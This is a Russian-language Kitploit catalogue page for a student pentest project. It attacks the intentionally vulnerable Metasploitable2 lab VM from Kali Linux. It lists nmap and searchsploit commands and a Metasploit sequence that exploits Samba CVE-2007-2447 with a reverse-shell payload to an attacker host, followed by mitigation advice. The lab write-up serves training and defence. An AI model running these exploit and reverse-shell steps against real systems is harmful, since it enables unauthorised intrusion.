Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Penetration-Testing-on-Metasploitable2 — Практический пентест-проект с использованием Kali Linux против Metasploitable2. Включает полный рабочий процесс: сканирование Nmap, перечисление сервисов, эксплуатацию через Metasploit (Samba CVE-2007-2447), проверку пост-эксплуатации и шаги по смягчению последствий. В репозитории содержатся команды, результаты и отчёт, демонстрирующие как наступательные техники, так и защитные рекомендации. | Kitploit
Инструменты/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
РазведкаСканеры уязвимостейКартирование сетиАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

РепозиторийСайт
111 месяцев назадЕщё не проверено

Описание

Практический пентест-проект с использованием Kali Linux против Metasploitable2. Включает полный рабочий процесс: сканирование Nmap, перечисление сервисов, эксплуатацию через Metasploit (Samba CVE-2007-2447), проверку пост-эксплуатации и шаги по смягчению последствий. В репозитории содержатся команды, результаты и отчёт, демонстрирующие как наступательные техники, так и защитные рекомендации.

Поделиться

Проект стажировки 2 — Тестирование на проникновение Metasploitable2

  • Краткое описание: Этот проект демонстрирует полный рабочий процесс тестирования на проникновение: разведка, перечисление, эксплуатация, пост-эксплуатационная проверка и рекомендации по смягчению последствий. В качестве целевой машины используется Metasploitable2, а атакующая машина — Kali Linux.

  • Инструменты: Kali Linux (атакующий) Nmap (разведка) Metasploit Framework (эксплуатация) SearchSploit / Exploit-DB (триаж)

Выполненные шаги:

  1. Сканирование: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x Обнаруженные сервисы (примеры): vsftpd 2.3.4 (баннер порта 21), Samba smbd 3.x (порт 445).

  2. Перечисление и триаж: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 Сопоставлены сервисы с потенциальными эксплойтами (бэкдор vsftpd, Samba username-map).

  3. Эксплуатация

  • Бэкдор vsftpd (CVE-2011-2523) — попытка эксплуатации: баннер Nmap присутствует, но сервис не отвечает; эксплойт не создал сессию.
  • Уязвимость Samba (CVE-2007-2447) успешно эксплуатирована: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit Получена интерактивная оболочка и проверен контекст пользователя.
  1. Пост-эксплуатация
  • Проверена информация о системе: id uname -a
  • Собраны доказательства и скриншоты.
  1. Рекомендации по смягчению последствий
  • Регулярное сканирование и инвентаризация активов.
  • Своевременная установка исправлений и обновление версий (обновить Samba).
  • Ограничение доступа к критическим портам (правила брандмауэра).
  • Отключение неиспользуемых сервисов и анонимного доступа.
  • Применение минимальных привилегий к общим ресурсам и учётным записям.
  • Сегментация сети и журналирование/мониторинг.
  • Планирование реагирования на инциденты.

Результат Успешно получена удалённая оболочка через эксплойт Samba, задокументирован путь атаки и составлен план по смягчению последствий. Полные журналы и выводы команд сохранены в папке scans/.

Скачать инструмент